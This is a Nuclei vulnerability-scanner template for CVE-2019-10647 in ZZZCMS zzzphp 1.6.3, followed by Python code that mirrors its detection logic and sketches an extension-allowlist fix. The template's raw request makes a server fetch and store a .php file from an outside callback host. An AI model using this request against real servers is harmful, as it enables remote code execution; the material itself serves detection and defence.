id: CVE-2019-10647

info:
  name: ZZZCMS ZZZPHP 1.6.3 - Remote PHP Code Execution (RCE)
  author: Sourabh-Sahu
  severity: critical
  description: |
    ZZZCMS zzzphp v1.6.3 contains a remote code execution vulnerability caused by a lack of file-type restrictions in inc/zzz_file.php. The catchimage action of plugins/ueditor/php/controller.php fetches every URL passed in the source[] parameter and writes the response under upload/ keeping the remote file's extension, so a URL ending in .php is stored as an executable PHP file. Exploitation requires an attacker-controlled host that serves the PHP payload as plain text; the stored file is then reachable (and executable) at upload/<name>.php.
  impact: |
    Attackers can execute arbitrary PHP code on the server, potentially leading to full system compromise.
  remediation: |
    Update to the latest version of ZZZCMS or apply security patches that restrict the file types inc/zzz_file.php is allowed to write.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-10647
    - https://github.com/kyrie403/Vuln/blob/master/zzzcms/zzzphp%20v1.6.3%20write%20file%20with%20dangerous%20type.md
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-10647
    cwe-id: CWE-434
    epss-score: 0.61672
    epss-percentile: 0.98357
    cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: zzzcms
    product: zzzphp
  tags: cve,cve2019,rce,zzzphp,intrusive,file-upload,vuln,zzzcms,oast,oob,vkev

flow: http(1) && http(2)

variables:
  file: "{{randstr}}.php"

http:
  # Request 1: make the server fetch a .php URL from the OAST host. The DNS
  # callback proves the server reached out; the JSON body reports the name
  # the file was stored under.
  - raw:
      - |
        POST /plugins/ueditor/php/controller.php?action=catchimage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        source[]=http://{{interactsh-url}}/{{file}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains_all(body, "SUCCESS","state")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: filename
        regex:
          - '"title":"([^"]+)"'
        internal: true

  # Request 2: confirm the fetched file was written with its .php extension
  # and is served from the web root.
  - raw:
      - |
        GET /upload/{{filename}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: status
        status:
          - 200
# digest: 490a004630440220242441f4b4057d9ccfe5d46425af86c17af6e908cf9d5d20869bb7aee7751a6902206c1eb3bbd8372832b297df9aff60c05c58514f61f9156416466c598af07c2bee:922c64590222798bb761d5b6d8e72950
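The template's two-stage decision (DNS callback, SUCCESS/state in the JSON body, then the `"title"` extractor feeding `/upload/<name>`) is easy to get subtly wrong when re-implemented in a custom scanner. The following Python is an added example, not part of the template or of ZZZCMS: it mirrors that decision over two constructed catchimage responses, flags a stored name only when its extension is executable, and shows an illustrative server-side fix (not the vendor's patch) that allowlists image extensions and never reuses the remote filename. The JSON bodies, the `DANGEROUS_EXTENSIONS` and `IMAGE_EXTENSIONS` sets, and the host `attacker.test` are assumptions for the example.

```python
import re
import secrets
from urllib.parse import urlparse

# Same regex the template's extractor applies to the catchimage JSON response.
TITLE_RE = re.compile(r'"title":"([^"]+)"')

# Extensions a remote-fetch "catcher" must never store verbatim
# (assumed list for this example; the template itself only tries .php).
DANGEROUS_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar"}

# Allowlist an image catcher should enforce instead (assumed for this example).
IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "bmp", "webp"}

# Constructed sample responses, not captured from a real ZZZCMS instance.
VULNERABLE_BODY = ('{"state":"SUCCESS","list":[{"state":"SUCCESS",'
                   '"url":"upload/a1b2c3d4.php","title":"a1b2c3d4.php",'
                   '"original":"a1b2c3d4.php"}]}')
# A patched catcher still answers with an outer SUCCESS/state, so the
# contains_all() check alone would pass; the empty title is what stops it.
PATCHED_BODY = ('{"state":"SUCCESS","list":[{"state":"ERROR file type not allowed",'
                '"url":"","title":"","original":"a1b2c3d4.php"}]}')


def extension_of(name: str) -> str:
    """Lower-cased text after the last dot, or "" if there is no dot."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def extract_stored_name(body: str):
    """Stored filename reported by the catcher (template's extractor), or None."""
    m = TITLE_RE.search(body)
    return m.group(1) if m else None


def assess_catchimage(status_code: int, body: str, saw_dns_callback: bool) -> dict:
    """Mirror the template: request 1 is only interesting if the server reached
    out (DNS callback), answered 200 with SUCCESS/state, and reported a stored
    name; request 2 would then GET /upload/<name>, computed here as verify_path."""
    result = {"reached_out": saw_dns_callback, "stored_as": None,
              "verify_path": None, "vulnerable": False}
    if status_code != 200 or not saw_dns_callback:
        return result
    if not ("SUCCESS" in body and "state" in body):
        return result
    stored = extract_stored_name(body)
    if stored is None:
        return result
    result["stored_as"] = stored
    result["verify_path"] = "/upload/" + stored
    # The file-upload bug is only real if the name kept an executable extension.
    result["vulnerable"] = extension_of(stored) in DANGEROUS_EXTENSIONS
    return result


def safe_store_name(remote_url: str):
    """Illustrative fix for the catcher: take the extension from the URL path
    only, allow images only, and store under a random name. Returns None when
    the fetch must be refused."""
    path = urlparse(remote_url).path          # query string is ignored on purpose
    ext = extension_of(path.rsplit("/", 1)[-1])
    if ext not in IMAGE_EXTENSIONS:
        return None
    return secrets.token_hex(8) + "." + ext


if __name__ == "__main__":
    print(assess_catchimage(200, VULNERABLE_BODY, True))
    print(assess_catchimage(200, PATCHED_BODY, True))
    print(safe_store_name("http://attacker.test/shell.php"),
          safe_store_name("http://attacker.test/x.jpg?y=1.php"))
```

Two caveats a practitioner should keep in mind. First, the template's second request only checks for HTTP 200 on `/upload/<name>.php`, which proves the file was written with a `.php` name, not that the server executes it; the OAST host serves its default body, not PHP, so confirming execution needs a separate, deliberately benign payload. Second, an extension allowlist derived from the URL is necessary but not sufficient as a fix: the fetched bytes should be validated as an image as well, and the `upload/` directory should be served with PHP execution disabled so a bypass of the name check cannot become code execution.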